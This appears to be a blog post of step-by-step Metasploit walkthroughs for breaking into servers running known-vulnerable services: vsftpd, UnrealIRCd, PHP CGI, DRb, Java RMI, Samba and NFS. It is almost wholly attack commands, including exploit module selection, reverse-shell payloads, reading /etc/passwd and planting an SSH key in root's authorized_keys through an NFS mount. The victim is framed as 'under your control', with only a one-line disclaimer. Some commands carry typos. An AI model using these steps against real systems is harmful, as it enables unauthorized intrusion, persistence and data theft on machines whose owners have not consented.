Hacking UNIX FTP Server via VSFTP:
Run BackTrack or Kali Linux
Open terminal and run Metasploit msfconsole or run from backtrack menu
Run the following commands
 Msf> nmap –sV –p 21
(You will find if there is a FTP on target and port 21 is open)
 Msf>Search vsftp
(Available exploits will be shown)
 Msf> use exploit/unix/ftp/vsftp_234_backdoor
 Msf> info exploit/unix/ftp/vsftp_234_backdoor
 Msf> show options
 Msf> set RHOST
 Msf> show payloads
(You will get available payloads)
 Msf> set payload cmd/unix/interact
 Msf> exploit
(Game over your target victim is under your control and victim’s terminal shell)
You can run the following commands on victim shell

Id
Uname –a
Ifconfig
Whoami
Cat /etc/passwd
Exit and exit again

Hacking UNIX Server via Unreal lRCD 3.2.8.1 backdoor:
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
Run the following commands
 Msf> nmap –sV –p 6667
(You will find if there is Unreal ircd on target and port 6667 is open)
 Msf>Search unrealircd
(Available exploits will be shown)
 Msf> use exploit/unix/irc/unreal_ircd_3281_backdoor
 Msf> info exploit/unix/irc/unreal_ircd_3281_backdoor
 Msf> show options
 Msf> set RHOST
 Msf> show payloads
(You will get list of all available payloads)
 Msf> exploit


Hacking Web Server via PHP CGI Argument Injection:
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 Msf> nmap –sV –p 80
(You will find if there is an Apache httpd 2.2.8 ((Ubuntu) DAV/2) on target and port 80 is open)
Type IP address of vulnerable web server like http://192.168.132.9/phpmyadmin/
(You will get PHP MyAdmin page and if you type Type IP address of vulnerable web server like http://192.168.132.9/phpmyadmin/?-s it will show server side coding)

 Msf>Search php_cgi
(Available exploits will be shown)
 Msf> info exploit/multi/http/php_cgi_arg_injection
 Msf> use exploit/multi/http/php_cgi_arg_injection
 Msf> show payloads
(You will get list of all available payloads)
 Msf> set payload php/meterpreter/reverse_tcp
 Msf> show options
 Msf> set RHOST (if require)
 Msf> set LHOST (if require)
 Msf> exploit
You will get meterpreter session on which you can run several remote shell commands like below.
Sysinfo
Ls
Cat index.php
(You can now see the source codes for index.php. GAME OVER)


DRuby Distributed Ruby Code Execution
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 Msf> nmap –sV –p 0-65535
(You will find something unknown on target and port 8787/tcp is open)
Msf>amap 8787
(You can see ruby and druby service is running)
 Msf> search drb
 Msf> info exploit/linux/misc/drb_remote_codeexec
 Msf> use exploit/linux/misc/drb_remote_codeexec
 Msf> show payloads
 Msf> set payload cmd/unix/reverse
 Msf> show options
 Msf> set URI druby://:8787
 Msf> set LHOST
 Msf> exploit
(Game over) you can type following commands in remote host session
id
uname –a
Ifconfig
whoami
Press Ctrl+C and y to abort the session

Java RMI Server – Java Code Execution
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 Msf> nmap –sV –p 0-65535
(You will find something rmiregistry on target and port 1099/tcp is open)
Msf>amap 8787
(You can see ruby and druby service is running)
 Msf> search rmiregistry
 Msf> info exploit/multi/misc/java_rmi_server
 Msf> use exploit/multi/misc/java_rmi_server
 Msf> show payloads
 Msf> show options
 Msf> set RHOST
 Msf> exploit
(Game over) you will get meterpreter session and can type following commands in remote host session
Sysinfo
Shell
id
uname –a
Ifconfig
Whoami
cat /et/passwd
type exit and exit again to abort the session


Samba -username map script- Remote Command Execution
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 Msf> nmap –sV –p 0-65535
(You will find something netbios-ssn on target and port 139/tcp is open)
 Msf> search samba
 Msf> info exploit/multi/samba/usermap_script
 Msf> use exploit/multi/ samba/usermap_script
 Msf> set RHOST
 Msf> exploit
(Game over) you will get meterpreter session and can type following commands in remote host session
id
uname –a
Ifconfig
Whoami
cat /et/passwd
Press Ctrl+ C then type Y and exit again to abort the session

NFS Misconfiguration – Access via SSH
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 nmap –sV –p 0-65535
(You will find something on target like port ssh 22/tcp, rpcbind 111/tcp and nfs 2049/tcp is open)
 ssh root@
(You will get permission denied publickey, password message)
 rpcinfo –p
(you will get all nfs information related to version 2, 3, and 4)
 showmount –e
(You can see Export list for <target IP address)
 ssh-keygen (This will generate a fake publickey to broadcast)
 mkdir /tmp/test
 mount –t nfs :/ /tmp/test/ -o nolock
 cat ~/.ssh/id_rsa.pub >> /tmp/test/root/.ssh/authorized_keys
 unmounts /tmp/test/
 ssh root@
(You will see the NFS share of remote server and system information)
Ifconfig
id
uname –a
Whoami
cat /et/passwd
type exit and exit again to abort the session

Caution: do not use this for any illegal activity and if done you and only you will be responsible for that.

Send your feedbacks

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s